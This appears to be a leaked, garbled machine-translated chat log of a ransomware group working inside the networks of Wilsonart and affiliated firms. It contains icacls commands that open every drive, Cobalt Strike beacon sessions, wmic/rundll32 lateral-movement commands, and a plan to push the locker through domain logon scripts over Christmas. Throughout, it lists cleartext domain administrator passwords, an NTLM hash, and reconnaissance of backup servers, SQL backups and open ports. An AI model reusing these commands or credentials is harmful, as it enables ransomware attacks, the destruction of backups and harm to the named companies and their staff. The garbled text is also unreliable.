Everyone:F /T /C /Q icacls J:\* /grant Everyone:F /T /C /Q icacls K:\* /grant Everyone:F /T /C /Q icacls L:\* /grant Everyone:F /T /C /Q icacls M:\* /grant Everyone:F /T /C /Q icacls N:\* /grant Everyone:F /T /C /Q icacls O:\* /grant Everyone:F /T /C /Q icacls P:\* /grant Everyone:F /T /C /Q icacls Q:\* /grant Everyone:F /T /C /Q icacls R:\* /grant Everyone:F /T /C /Q icacls S:\* /grant Everyone:F /T /C /Q icacls T:\* /grant Everyone:F /T /C /Q icacls U:\* /grant Everyone:F /T /C /Q icacls V:\* /grant Everyone:F /T /C /Q icacls W:\* /grant Everyone:F /T /C /Q icacls X:\* /grant Everyone:F /T /C /Q icacls Y:\* /grant Everyone:F /T /C /Q icacls Z:\* /grant Everyone:F /T /C /Q ``The error was the same, but the conclusion sailed away,`` the disks were scrambling,`` the servers were dragging,`` the servers were dragging,`` 908. 104.194.10.161:53256 KtdyhCtQUR4qWj0JfZd45Gn7ivsiLJ5sILi ```о just in time) so what's up? let me see for myself tell me what session yes tokenblin give me access to the server where you're working with the domain what about it dllkapo https is not jumping on the case so it blames on the sharingvot error on top of what blames? you rubbed aver ... you're not supposed to get an error...well, cmb yes it's a bindpipe where -try the servers that are not pulled by bindpipe all cmb pulled where +that's the picture and the servers are pulled by delku it says when we try to share disks on the armas Win32 Error: The process cannot access the file because it is being used by another process. ``Snow the skinoon is shitting with an error only through smb through delki and httpsc.wilsonart.com\-admin-bownem 361ab72479515c09284591c50cebfe23 how is it not shitting? If you already have domain mapped, can we just lock the domains we already have? ``` yes, you can at once@tl2 @tl1 those domains that are already primatted and attracted can we lock immediately ? cJZw4bgWNBuYAeLXToHzNLYZOqnTS8CJwIe` logn: fowlerh@wilsonart.com pass: R3f1nn3j2! 
Wilsonart.com\Administrator DA {}wallC2013 Wilsonart.com\roeders DA Dell@2020 but i don't have any clean ones(( try paiload to the ipi instead of the domainlit and more than 100k do not limit if the coba has a limit of 100k and a lot of servers come out do not knocka why? does not knock something somewhere? he supposed to come back if it does not shut down with the ends (it should @tl1 wait( i don't have @tl1@tl2 answer two clean coba? beacon> shell ping HQTAS37 [*] Tasked beacon to run: ping HQTAS37 [+] host called home, sent: 43 bytes [+] received output: Ping request could not find host HQTAS37. Please check the name and try again. ``` ``` beacon> shell ping HQTAS65 [*] Tasked beacon to run: ping HQTAS65 [+] host called home, sent: 43 bytes [+] received output: Ping request could not find host HQTAS65. Please check the name and try again. ´´but there is an isolated sabnet or something randomly pinged a little hands those who did not respond to the list from hell, hit the eheskoy, it came out only alive in the same sabnet where the disabled others pinged ok ? disconnected must be the other servers are not pinging because they are old/disconnected or there is no route to them? WI.RWP.COM srv: 31 / 60 arm: 122 / 515 Go to the root the root is always better from there for some reason)why not just put it in the root C ? ``` copy \DCWAS01\SYSVOL\Wilsonart.com\scripts\1.exe C:{\windows && C:\windows\1.exe ``Well, the locker does not seem to touch the executable files, in theory it should work)``Tried it, I just do not know if the current build encrypts logon scripts to be honest :smile:to know for surehttp://www://www/web/v78/logon_agent/la_configure_scriptspx#:text=In%20%20theGroup_scripts.websense.com/content/support/library/web/v78/logon_agent/la_configure_scripts.aspx#:~:text=In%20the%20Group%20Policy%20Management,Logon%20in%20the%20right%20pane.&text=In%20the%20Logon%20Properties%20window,Scripts\Logon\%20is%20displayed.and who tried something like this before? 
to come and finish it themselves so let's make a blank for the rest) not the fact that the domain authorization will fall off so by the time people come to the domain will fuck up. especially on weekends and holidays. it's Christmas they have a logon script, and how? and more additional tasks) then add copying and launching the locker to the logon scripts) and the ox isn't needed people will come to work, turn on the car and lock themselves in peace the date on armatures locks in minutes if not seconds ``Then readiness 10 min)`` and so on? builds dll lists and host lists have prepared themselves commands work in tempav + vindefrule av and start? snp no so well general alg, is to scatter batnik on shary disks from the armas to report by hand finishdana vmik and kopismozhet do rait errors?aha it is possible, but it is long, kapetspravdi threads ... they have a variant with a list of hosts + startup from systems + output and tdmb by the way in general take the same psek from the ms what to psek there? track the total errors? this is how you can pull in the servers, for example `` copy %dll% \\\%1\admin$ wmic /node:%1 process call create "rundll32 c:\windows\%dll% entryPoint" Right? this gotch throws it in and runs it as a parameter. the batcnik throws it in and runs it .haven't made a batcnik yet. most likely?) most likely. what do we write in the batcnik? and run what? take an ip from the list, if it pings we call the batch, which takes the ip as a parameter. the batcnik throws it in and runs it. everything in the fucking streams. ``` uk.Wilsonart.com srv: 1 / 1 ``` it's actually this ``` cn.Wilsonart.com srv: 1 / 1 ``in a nutshell the algorithm is like this ``something like that sharpsharesng ips list.txt --alive -exec pull.By the way how do you solve the mass spreading of the eche?
WI.RWP.COM srv: / 60 arm: / 515 polyrey.net srv: 53 / 64 arm: 45 / 340 eu.Wilsonart.com srv: 36 / 43 arm: 2 / 10 resopal.lan srv: 26 / 27 arm: 11 / 100 uk.Wilsonart.com srv: 22 / 25 arm: 44 / 157 ``These 5 can be drawn from others. BUSHBOARD.CO.UK srv: 10 / 17 arm: 26 / 136 arborite.com srv: 9 / 12 arm: 29 / 154 SLF.LOCAL srv: 8 / 10 arm: 49 / 66 ralpwilson.com srv: 1 / 1 uk.Wilsonart.com srv: 1 / 1 ``Map the servers unreachable, tasklist cut off the crisis services and while scattering attract other domains then scatter the file that will shasharit disks and stuff on armasperechtalivayut itdasy question) with small or large domain will start?they were not, but I'll walk to be sure on the classic drop snaps if any then skipkey (we sent a broadcast but no one woke up check on the default settings yesvole in biose should be turned on, right?yes you can go there quietly as you turn it off from the main domain in that domain found7 from other domains can only see the dkpod YES of the entrance domain have access thereto from another domain to mask its serverspolozhdeny trust has anything with anything? WI.RWP.COM srv: / 60 arm: / 515 ``Let's think about merging Directory of \BBDC03.bushboard.co.uk\Bushboard Backups\Backup 21/10/2020 21:25 . 21/10/2020 21:25 . 21/10/2020 21:25 11,334 Backup.vbm 21/10/2020 21:25 357,040,234,496 BackupD2020-10-21T204800_278E.vbk 2 File(s) 357,040,245,830 bytes 2 Dir(s) 7,410,316,644,352 bytes free ``` ``` Directory of \BBDC03.bushboard.co.uk\Bushboard Backups\Daily 26/12/2020 21:22 . 26/12/2020 21:22 . 
26/12/2020 21:22 277,452 Daily.vbm 26/12/2020 21:19 8,877,858,816 DailyD2020-12-22T210026_0A86.vrb 26/12/2020 21:20 5,325,545,472 DailyD2020-12-23T210030_4C1A.vrb 26/12/2020 21:22 3,240,009,728 DailyD2020-12-24T210037_9249.vrb 26/12/2020 21:22 2,230,308,864 DailyD2020-12-25T210022_FD90.vrb 26/12/2020 21:22 989,772,115,968 DailyD2020-12-26T210030_B7DE.vbk 6 File(s) 1,009,446,116,300 bytes 2 Dir(s) 7,410,316,644,352 bytes free ``` ``` Directory of \BBDC03.bushboard.co.uk\Bushboard Backups\Full Backup 10/10/2020 21:35 . 10/10/2020 21:35 . 10/10/2020 21:35 1,952 Full Backup.vbm 1 File(s) 1,952 bytes 2 Dir(s) 7,410,316,644,352 bytes free ``` ``` Directory of \BBDC03.bushboard.co.uk\Bushboard Backups\VCenter 26/12/2020 20:05 . 26/12/2020 20:05 . 26/12/2020 20:05 366,006 VCenter.vbm 12/12/2020 20:04:21,046,738,944 VCenterD2020-12-12T200342_5ADE.vbk 13/12/2020 20:03 709,451,776 VCenterD2020-12-13T200034_237F.vib 14/12/2020 20:03 740,597,760 VCenterD2020-12-14T200031_7C1E.vib 15/12/2020 20:03 716,304,384 VCenterD2020-12-15T200029_B706.vib 16/12/2020 20:03 731,889,664 VCenterD2020-12-16T200028_8B8F.vib 17/12/2020 20:03 786,378,752 VCenterD2020-12-17T200033_E75E.vib 18/12/2020 20:03 719,417,344 VCenterD2020-12-18T200017_4E4C.vib 19/12/2020 20:04 22,938,509,312 VCenterD2020-12-19T200341_5DF3.vbk 20/12/2020 20:03 777,809,920 VCenterD2020-12-20T200031_A2E8.vib 21/12/2020 20:03 726,798,336 VCenterD2020-12-21T200035_AF2A.vib 22/12/2020 20:03 764,702,720 VCenterD2020-12-22T200039_2DFC.vib 23/12/2020 20:03 750,419,968 VCenterD2020-12-23T200036_9458.vib 24/12/2020 20:03 828,559,360 VCenterD2020-12-24T200021_2518.vib 25/12/2020 20:03 777,314,304 VCenterD2020-12-25T200028_4E96.vib 26/12/2020 20:05 24,845,225,984 VCenterD2020-12-26T200359_13B5.vbk 16 File(s) 77,860,484,534 bytes 2 Dir(s) 7,410,316,644,352 bytes free ``I need to see the files in these folders 21/10/2020 21:25 Backup 26/12/2020 21:22 Daily 10/10/2020 21:35 Full Backup 26/12/2020 20:05 VCenter `````` Directory of 
\BBDC03.bushboard.co.uk\ADMIN$ 23/12/2020 14:04 . 23/12/2020 14:04 . 16/07/2016 13:23 ADFS 07/02/2019 15:13 appcompat 13/10/2020 15:16 application compatibility scripts 28/09/2020 20:12 AppPatch 22/12/2020 14:46 AppReadiness 03/05/2019 07:17 bcastdvr 28/04/2018 05:47 63,488 bfsvc.exe 23/12/2020 09:49 16,588,854 BGInfo.bmp 16/07/2016 13:23 Boot 16/07/2016 13:23 Branding 23/12/2020 13:45 CbsTemp 03/05/2019 07:17 PM Cluster 03/05/2019 07:16 CSC 16/07/2016 13:23 Cursors 13/08/2019 16:16 436,524 dd_vcredistMSI13B4.txt 23/12/2020 14:04 423,110 dd_vcredistMSI2C36.txt 29/10/2020 16:36 582,720 dd_vcredistMSI576D.txt 29/10/2020 16:45 582,726 dd_vcredistMSI5E40.txt 13/08/2019 16:16:13,680 dd_vcredistUI13B4.txt 23/12/2020 14:04 30,450 dd_vcredistUI2C36.txt 29/10/2020 16:36 46,300 dd_vcredistUI576D.txt 29/10/2020 16:45 46,300 dd_vcredistUI5E40.txt 20/11/2016 18:17 de-DE 02/08/2019 09:39 debug 21/05/2019 04:02:02 232,960 DfsrAdmin.exe 20/06/2019 10:56 1,315 DfsrAdmin.exe.config 16/07/2016 13:23 diagnostics 20/11/2016 18:17 digitalLocker 16/07/2016 13:23 drivers 06/12/2018 16:27 4,056 DtcInstall.log 06/12/2018 17:21 en-GB 01/03/2019 13:30 en-US 06/08/2020 22:54 4,674,784 explorer.exe 16/07/2016 13:23 GameBarPresenceWriter 16/07/2016 13:23 Globalization 20/11/2016 18:17 Help 03/06/2017 08:52 975,872 HelpPane.exe 16/07/2016 13:18 18,432 hh.exe 01/03/2019 14:19:94,567 iis.log 03/05/2019 07:17 IME 28/09/2020 20:12 ImmersiveControlPanel 22/12/2020 14:38 INF 16/07/2016 13:23 InfusedApps 16/07/2016 13:23 InputMethod 16/07/2016 13:23 L2Schemas 18/07/2019 13:35 LiveKernelReports 14/02/2019 17:31 Logs 20/11/2016 09:52 1,340 lsasetup.log 29/05/2019 12:24 AM LSDeployment 16/07/2016 13:18 43,131 mib.bin 26/12/2020 09:51 Microsoft.NET 16/07/2016 13:23 Migration 03/05/2019 07:17 MiracastView 16/07/2016 13:23 ModemLogs 16/07/2016 13:19 243,200 notepad.exe 19/07/2019 10:05 467,492 ntbtlog.txt 13/08/2019 08:54 OCR 10/11/2020 15:39:405 ODBC.INI 02/08/2019 16:01 469 ODBCINST.INI 16/07/2016 13:23 
Offline Web Pages 06/12/2018 16:27 Panther 16/07/2016 13:23 Performance 09/12/2020 09:07 2,614,310 PFRO.log 16/07/2016 13:23 PLA 28/09/2020 20:12 PolicyDefinitions 09/12/2020 09:08 prefetch 03/05/2019 07:17 PrintDialog 16/07/2016 13:23 Provisioning 13/10/2020 15:15 rdcbDb 04/03/2017 06:18 320,512 regedit.exe 01/03/2019 14:15 AM Registration 13/10/2020 15:15 RemotePackages 11/11/2020 09:08 AM rescache 16/07/2016 13:23 Resources 16/07/2016 13:23 SchCache 16/07/2016 13:23 schemas 16/07/2016 13:23 security 16/07/2016 13:19 28,777 ServerStandard.xml 20/11/2016 09:52 serviceProfiles 28/09/2020 20:12 servicing 16/07/2016 13:25 Setup 22/12/2020 14:38 12,560 setupact.log 20/11/2016 18:53 0 setuperr.log 13/02/2020 14:52 ShellExperiences 16/07/2016 13:23 SKB 06/12/2018 21:44 SoftwareDistribution 16/07/2016 13:23 Speech 16/07/2016 13:23 Speech_OneCore 08/07/2020 06:58 131,584 splwow64.exe 16/07/2016 13:23 System 16/07/2016 13:219 system.ini 22/12/2020 14:38 System32 16/07/2016 13:23 SystemApps 16/07/2016 13:23 SystemResources 23/12/2020 14:03 SysWOW64 23/12/2020 10:58 PM TAPI 20/11/2016 18:53 Tasks 27/12/2020 02:59 Temp 16/07/2016 13:23 tracing 16/07/2016 13:23 twain_32 16/07/2016 13:20 66,560 twain_32.dll 06/12/2018 17:12 Veeam 16/07/2016 13:23 Vss 13/10/2020 15:16 Web 02/08/2019 14:30 WID 16/07/2016 13:21 92 win.ini 27/12/2020 00:20 275 WindowsUpdate.log 16/07/2016 13:19 10:240 winhlp32.exe 23/12/2020 14:04 WinSxS 16/07/2016 13:18 316,640 WMSysPr9.prx 16/07/2016 13:18 11,264 write.exe 36 File(s) 29,085,208 bytes 77 Dir(s) 1,017,358,946,304 bytes free ``` ``` Directory of \BBDC03.bushboard.co.uk\Bushboard Backups 26/12/2020 05:13 . 26/12/2020 05:13 . 
21/10/2020 21:25 Backup 26/12/2020 21:22 Daily 10/10/2020 21:35 Full Backup 21/10/2020 11:52 Test 21/10/2020 11:43 PM Test Backup 26/12/2020 20:05 VCenter 0 File(s) 0 bytes 8 Dir(s) 7,410,316,644,352 bytes free ````SIDOUFHGS*DYIUHFDIGYSDUH*:GUILk dNSHostName: BBDC03.bushboard.co.uk Share name Type Used as Comment ------------------------------------------------------------------------------- ADMIN$ Disk Remote Admin Bushboard Backups Disk ``` Bushboard Backups Disk Directory of \BBDC03.bushboard.co.uk\SQL_Server\App\BespokeTables 27/12/2020 01:35 . 27/12/2020 01:35 . 23/12/2020 00:10 7,077,051,904 BespokeTables_backup_2020_12_23_000101_4310632.bak 24/12/2020 00:10 7,077,051,904 BespokeTables_backup_2020_12_24_000101_1575132.bak 25/12/2020 00:10 7,077,051,904 BespokeTables_backup_2020_12_25_000100_9237608.bak 26/12/2020 00:10 7,077,051,904 BespokeTables_backup_2020_12_26_000101_3225660.bak 27/12/2020 00:10 7,077,051,904 BespokeTables_backup_2020_12_27_000101_3078025.bak 5 File(s) 35,385,259,520 bytes 2 Dir(s) 4,194,904,961,024 bytes free ``` ``` Directory of \BBDC03.bushboard.co.uk\SQL_Server\App\DataAnalysis 27/12/2020 01:35 . 27/12/2020 01:35 . 23/12/2020 00:10 14,766,592 DataAnalysis_backup_2020_12_23_000101_5246638.bak 24/12/2020 00:10 14,766,592 DataAnalysis_backup_2020_12_24_000101_2199136.bak 25/12/2020 00:10 14,766,592 DataAnalysis_backup_2020_12_25_000100_9861612.bak 26/12/2020 00:10 14,766,592 DataAnalysis_backup_2020_12_26_000101_3849664.bak 27/12/2020 00:10 14,766,592 DataAnalysis_backup_2020_12_27_000101_3546028.bak 5 File(s) 73,832,960 bytes 2 Dir(s) 4,194,904,961,024 bytes free ``` ``` Directory of \BBDC03.bushboard.co.uk\SQL_Server\App\distribution 27/12/2020 01:35 . 27/12/2020 01:35 . 
23/12/2020 00:10 5,399,040 distribution_backup_2020_12_23_000101_5246638.bak 24/12/2020 00:10 5,399,040 distribution_backup_2020_12_24_000101_2199136.bak 25/12/2020 00:10 5,399,040 distribution_backup_2020_12_25_000100_9861612.bak 26/12/2020 00:10 5,399,040 distribution_backup_2020_12_26_000101_4005665.bak 27/12/2020 00:10 5,399,040 distribution_backup_2020_12_27_000101_3702029.bak 5 File(s) 26,995,200 bytes 2 Dir(s) 4,194,904,961,024 bytes free ``` ``` Directory of \BBDC03.bushboard.co.uk\SQL_Server\App\ManufacturingDemo 27/12/2020 01:35 . 27/12/2020 01:35 . 23/12/2020 00:14 23,387,529,728 ManufacturingDemo_backup_202020_12_23_000101_5870642.bak 24/12/2020 00:14 23,387,529,728 ManufacturingDemo_backup_202020_12_24_000101_2355137.bak 25/12/2020 00:14 23,387,529,728 ManufacturingDemo_backup_202020_12_25_000101_0017613.bak 26/12/2020 00:14 23,387,529,728 ManufacturingDemo_backup_202020_12_26_000101_4161666.bak 27/12/2020 00:14 23,387,529,728 ManufacturingDemo_backup_202020_12_27_000101_3702029.bak 5 File(s) 116,937,648,640 bytes 2 Dir(s) 4,194,904,961,024 bytes free ``` ``` Directory of \BBDC03.bushboard.co.uk\SQL_Server\App\ReportServer$CRM 27/12/2020 01:35 . 27/12/2020 01:35 . 23/12/2020 00:14 694,302,208 ReportServer$CRM_backup_2020_12_23_000101_7898655.bak 24/12/2020 00:14 697,447,936 ReportServer$CRM_backup_2020_12_24_000101_2355137.bak 25/12/2020 00:14 697,447,936 ReportServer$CRM_backup_2020_12_25_000101_0017613.bak 26/12/2020 00:14 696,399,360 ReportServer$CRM_backup_2020_12_26_000101_4161666.bak 27/12/2020 00:14 694,302,208 ReportServer$CRM_backup_2020_12_27_000101_3858030.bak 5 File(s) 3,479,899,648 bytes 2 Dir(s) 4,194,904,961,024 bytes free ``` ``` Directory of \BBDC03.bushboard.co.uk\SQL_Server\App\ReportServer$CRMTempDB 27/12/2020 01:35 . 27/12/2020 01:35 . 
23/12/2020 00:14 23,332,352 ReportServer$CRMTempDB_backup_2020_12_23_000101_8054656.bak 24/12/2020 00:14 21,235,200 ReportServer$CRMTempDB_backup_2020_12_24_000101_2355137.bak 25/12/2020 00:14 22,283,776 ReportServer$CRMTempDB_backup_2020_12_25_000101_0173614.bak 26/12/2020 00:14 21,235,200 ReportServer$CRMTempDB_backup_2020_12_26_000101_4317667.bak 27/12/2020 00:14 21,235,200 ReportServer$CRMTempDB_backup_2020_12_27_000101_3858030.bak 5 File(s) 109,321,728 bytes 2 Dir(s) 4,194,904,961,024 bytes free ``` ``` Directory of \BBDC03.bushboard.co.uk\SQL_Server\App\SP2010_Admin_Content 27/12/2020 01:35 . 27/12/2020 01:35 . 23/12/2020 00:14 354,596,352 SP2010_Admin_Content_backup_2020_12_23_000101_9458665.bak 24/12/2020 00:14 354,596,352 SP2010_Admin_Content_backup_2020_12_24_000101_2511138.bak 25/12/2020 00:14 354,596,352 SP2010_Admin_Content_backup_2020_12_25_000101_0485616.bak 26/12/2020 00:14 354,596,352 SP2010_Admin_Content_backup_2020_12_26_000101_4473668.bak 27/12/2020 00:14 354,596,352 SP2010_Admin_Content_backup_2020_12_27_000101_4170032.bak 5 File(s) 1,772,981,760 bytes 2 Dir(s) 4,194,904,961,024 bytes free ``` ``` Directory of \BBDC03.bushboard.co.uk\SQL_Server\App\SP2010_config 27/12/2020 01:35 . 27/12/2020 01:35 . 23/12/2020 00:14 18,001,408 SP2010_config_backup_202020_12_23_000101_9770667.bak 24/12/2020 00:14 18,001,408 SP2010_config_backup_2020_12_24_000101_2667139.bak 25/12/2020 00:14 18,001,408 SP2010_config_backup_2020_12_25_000101_0641617.bak 26/12/2020 00:14 18,001,408 SP2010_config_backup_2020_12_26_000101_4473668.bak 27/12/2020 00:14 18,001,408 SP2010_config_backup_2020_12_27_000101_4170032.bak 5 File(s) 90,007,040 bytes 2 Dir(s) 4,194,904,961,024 bytes free ``the chek in labetam like brodcast on all network canhm, but there requires macadr)https://www.depicus.com/wake-on-lan/wake-on-lan-cmduser7user3 two of us not enough us all here ?
7/12/2020 01:35 BespokeTables 27/12/2020 01:35 DataAnalysis 27/12/2020 01:35 distribution 27/12/2020 01:35 ManufacturingDemo 27/12/2020 01:35 ReportServer$CRM 27/12/2020 01:35 ReportServer$CRMTempDB 27/12/2020 01:35 SP2010_Admin_Content 27/12/2020 01:35 SP2010_config `````` Directory of \BBDC03.bushboard.co.uk\SQL_Server\App 09/08/2019 15:38 . 09/08/2019 15:38 . 27/12/2020 01:35 A_Winman 27/12/2020 01:35 PM BBHoldings 27/12/2020 01:35 PM Bdc_Service_DB_aff7f39f8b654700a677cbcc4c641655 27/12/2020 01:35 PM BespokeTables 27/12/2020 01:35 DataAnalysis 27/12/2020 01:35 distribution 27/12/2020 01:35 ManufacturingDemo 27/12/2020 01:35 ReportServer$CRM 27/12/2020 01:35 ReportServer$CRMTempDB 27/12/2020 01:35 SP2010_Admin_Content 27/12/2020 01:35 SP2010_config 27/12/2020 01:35 WinMan 27/12/2020 01:35 WinManMaster 27/12/2020 01:35 WSS_Content 27/12/2020 01:35 PM WSS_Content_5eddefdaf170489fac09efbaa04bc6ed 27/12/2020 01:35 PM WSS_Content_704c79658cf640d5a47ca3fd6e902911 27/12/2020 01:35 PM WSS_Logging 27/12/2020 01:35 WSS_Search_bbdb01 0 File(s) 0 bytes 20 Dir(s) 4,194,904,961,024 bytes free ``Please don't forget servers that will be mapped need to be run with the tasklist section we will pull in the trust after turning off the avs we will go there even dll from depatam simantec breaks everything2003 nothing flies out there or something I don't understand ``some bug or something WI.RWP.COM srv: / 60 arm: / 515 ``Some files you might find interesting, some listings on backups and fileservers) beacon> shell dir \\BBDC03.bushboard.co.uk\vCenterBackups [*] Tasked beacon to run: dir \\BBDC03.bushboard.co.uk\vCenterBackups [+] host called home, sent: 74 bytes [+] received output: Volume in drive \BBDC03.bushboard.co.uk\vCenterBackups is Backup of VSphere Volume Serial Number is 34A9-AA2B Directory of \BBDC03.bushboard.co.uk\vCenterBackups 23/10/2020 13:32 . 23/10/2020 13:32 . 
0 File(s) 0 bytes 2 Dir(s) 7,410,316,644,352 bytes free `````` beacon> shell dir \\BBDC03.bushboard.co.uk\SQL_Server [*] Tasked beacon to run: dir \\BBDC03.bushboard.co.uk\SQL_Server [+] host called home, sent: 70 bytes [+] received output: Volume in drive \BBDC03.bushboard.co.uk\SQL_Server is New Volume Volume Serial Number is 5A0C-69A2 Directory of \BBDC03.bushboard.co.uk\SQL_Server 22/08/2019 13:16 . 22/08/2019 13:16 . 09/08/2019 15:38 App 09/08/2019 15:57 Sys 0 File(s) 0 bytes 4 Dir(s) 4,194,904,961,024 bytes free beacon> shell dir \\BBDC03.bushboard.co.uk\SQL_Server\App [*] Tasked beacon to run: dir \BBDC03.bushboard.co.uk\SQL_Server\App [+] host called home, sent: 74 bytes [+] received output: Volume in drive \BBDC03.bushboard.co.uk\SQL_Server is New Volume Volume Serial Number is 5A0C-69A2 Directory of \BBDC03.bushboard.co.uk\SQL_Server\App 09/08/2019 15:38 . 09/08/2019 15:38 . 27/12/2020 01:35 A_Winman 27/12/2020 01:35 PM BBHoldings 27/12/2020 01:35 PM Bdc_Service_DB_aff7f39f8b654700a677cbcc4c641655 27/12/2020 01:35 PM BespokeTables 27/12/2020 01:35 DataAnalysis 27/12/2020 01:35 distribution 27/12/2020 01:35 ManufacturingDemo 27/12/2020 01:35 ReportServer$CRM 27/12/2020 01:35 ReportServer$CRMTempDB 27/12/2020 01:35 SP2010_Admin_Content 27/12/2020 01:35 SP2010_config 27/12/2020 01:35 WinMan 27/12/2020 01:35 WinManMaster 27/12/2020 01:35 WSS_Content 27/12/2020 01:35 PM WSS_Content_5eddefdaf170489fac09efbaa04bc6ed 27/12/2020 01:35 PM WSS_Content_704c79658cf640d5a47ca3fd6e902911 27/12/2020 01:35 PM WSS_Logging 27/12/2020 01:35 WSS_Search_bbdb01 0 File(s) 0 bytes 20 Dir(s) 4,194,904,961,024 bytes free beacon> shell dir \\BBDC03.bushboard.co.uk\SQL_Server\Sys [*] Tasked beacon to run: dir \BBDC03.bushboard.co.uk\SQL_Server\Sys [+] host called home, sent: 74 bytes [+] received output: Volume in drive \BBDC03.bushboard.co.uk\SQL_Server is New Volume Volume Serial Number is 5A0C-69A2 Directory of \BBDC03.bushboard.co.uk\SQL_Server\Sys 09/08/2019 15:57 . 
09/08/2019 15:57 . 27/12/2020 01:30 master 27/12/2020 01:30 model 27/12/2020 01:30 msdb 0 File(s) 0 bytes 5 Dir(s) 4,194,904,961,024 bytes free ``Listing of these dirs`` dNSHostName: BBDC03.bushboard.co.uk Share name Type Used as Comment ------------------------------------------------------------------------------- ADMIN$ Disk Remote Admin Bushboard Backups Disk C$ Disk Default share E$ Disk Default share F$ Disk Default share IPC$ IPC Remote IPC iTop-2.6.1-4463 Disk log Disk SQL_Server Disk U$ Disk Default share UpdateServicesPackages Disk A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system. VBRCatalog Disk vCenterBackups Disk WsusContent Disk A network share to be used by Local Publishing to place published content on this WSUS system. WSUSTemp Disk A network share used by Local Publishing from a Remote WSUS Console Instance. ``` SQL_Server The printerBackup, which will be pkv inet software[ ](https://mediaeveryone.com/group/wilsonart-com?msg=ChphJoH4mMpmgKttk) raised and scored, only about the batnick then there was talk and how to make it too `` `` >description: VMware vCenter 6.0 Server >operatingSystem: Windows Server 2012 R2 Datacenter >dNSHostName: dcwas79.Wilsonart.com login: fowlerh@wilsonart.com paswd: R3f1nn3j2! 
Share name Type Used as Comment ---------------------------------------- ADMIN$ Disk Remote Admin C$ Disk Default share D$ Disk Default share IPC$ IPC Remote IPC 170.7.76.79:5985 170.7.76.79:3389 170.7.76.79:636 170.7.76.79:514 170.7.76.79:443 170.7.76.79:389 170.7.76.79:139 170.7.76.79:135 170.7.76.79:88 170.7.76.79:80 >description: Veeam Backup Server >operatingSystem: Windows Server 2016 Standard >dNSHostName: dcveeam01.Wilsonart.com Share name Type Used as Comment ---------------------------------------- ADMIN$ Disk Remote Admin C$ Disk Default share F$ Disk Default share IPC$ IPC Remote IPC >description: Symantec End Point Management Server >operatingSystem: Windows Server 2012 Standard >dNSHostName: DCWAS45.Wilsonart.com login: admin paswd: pRe1Udlp! Share name Type Used as Comment ------------------------------------------ ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC print$ Disk Printer Drivers >description: PROD Symantec AntiVirus Management Server >operatingSystem: Windows Server 2012 Standard >dNSHostName: FLWAS03.Wilsonart.com net view \FLWAS03.Wilsonart.com /all System error 53 has occurred. The network path was not found. Ping statistics for 170.7.20.198: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), 170.7.20.198:53161 170.7.20.198:49154 170.7.20.198:49153 170.7.20.198:9090 170.7.20.198:8446 170.7.20.198:8445 170.7.20.198:8443 170.7.20.198:8014 170.7.20.198:8008 170.7.20.198:8006 170.7.20.198:5985 170.7.20.198:5060 170.7.20.198:3389 170.7.20.198:2000 170.7.20.198:1611 170.7.20.198:1610 170.7.20.198:1100 170.7.20.198:143 170.7.20.198:139 170.7.20.198:135 170.7.20.198:110 170.7.20.198:80 170.7.20.198:25 170.7.20.198:21 >description: Vcenter Server >dNSHostName: bod01-vce01.eu.wilsonart.com net view \bod01-vce01.eu.wilsonart.com /all System error 53 has occurred. The network path was not found. 
Ping statistics for 10.40.60.70: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), 10.40.60.70:9443 10.40.60.70:9087 10.40.60.70:9084 10.40.60.70:8084 10.40.60.70:8008 10.40.60.70:7444 10.40.60.70:5580 10.40.60.70:5480 10.40.60.70:5060 10.40.60.70:2020 10.40.60.70:2015 10.40.60.70:2014 10.40.60.70:2012 10.40.60.70:2000 10.40.60.70:1514 10.40.60.70:636 10.40.60.70:514 10.40.60.70:443 10.40.60.70:389 10.40.60.70:110 10.40.60.70:88 10.40.60.70:80 10.40.60.70:25 10.40.60.70:21 >description: Veeam Backup Server >operatingSystem: Windows Server 2016 Standard >dNSHostName: bod01-bkp01.eu.Wilsonart.com login: eu.wilsonart.com\svcveeam NTLM: 0e7674530ce330128b4425c70fb97f92 Share name Type Used as Comment ---------------------------------------------- ADMIN$ Disk Remote Admin C$ Disk Default share D$ Disk Default share F$ Disk Default share IPC$ IPC Remote IPC R$ Disk Default share V$ Disk Default share veeam_agent_ISOs Disk W$ Disk Default share X$ Disk Default share bod01-bkp01.eu.Wilsonart.com:5989 bod01-bkp01.eu.Wilsonart.com:5985 bod01-bkp01.eu.Wilsonart.com:3389 bod01-bkp01.eu.Wilsonart.com:139 bod01-bkp01.eu.Wilsonart.com:135 bod01-bkp01.eu.Wilsonart.com:111 bod01-bkp01.eu.Wilsonart.com:110 bod01-bkp01.eu.Wilsonart.com:80 bod01-bkp01.eu.Wilsonart.com:53 bod01-bkp01.eu.Wilsonart.com:25 (220 bod01-bkp01.eu.wilsonart.com Microsoft ESMTP MAIL Service, Version: 10.0.14393.0 ready at Sat, 26 Dec 2020 19:58:41 +0100 ) bod01-bkp01.eu.Wilsonart.com:21 (220 Microsoft FTP Service) bod01-bkp01.eu.Wilsonart.com:445 (platform: 500 version: 10.0 name: BOD01-BKP01 domain: EU) >dNSHostName: nas_signature.polyrey.net Share name Type Used as Comment ------------------------------------------------ Archives_Outlook Disk Astier Disk CALDERA_RIPS Disk Depot Disk Design Library Disk INFO Disk IPC$ IPC IPC Service () PROJETS_Signature Disk Signature_PAO Disk TEST_JFC Disk Users_Archives Disk Users_Archives 172.25.168.64:6281 172.25.168.64:5001 172.25.168.64:5000 172.25.168.64:548 
172.25.168.64:443 172.25.168.64:139 172.25.168.64:80 172.25.168.64:445 (platform: 500 version: 6.1 name: NAS_SIGNATURE domain: POLYREY) >description: virtuell auf VMware (Win 10) >operatingSystem: Windows 10 Pro >dNSHostName: VIPW7700.resopal.lan net view \VIPW7700.resopal.lan /all Systemfehler 53 aufgetreten. Der Netzwerkpfad wurde nicht gefunden. Antwort von 172.22.198.250: Zielhost nicht erreichbar. Ping-Statistik für 172.22.190.190: Pakete: Gesendet = 4, Empfangen = 4, Verloren = 0 (0% Verlust), 172.22.198.250:541 172.22.198.250:443 172.22.198.250:22 (SSH-2.0-U_fcWc) >operatingSystem: Windows 7 Professional >dNSHostName: BBBACKUP.bushboard.co.uk Ping request could not find host BBBACKUP.bushboard.co.uk. Please check the name and try again. >description: Backup Server >operatingSystem: Windows Server 2012 Datacenter >servicePrincipalName: 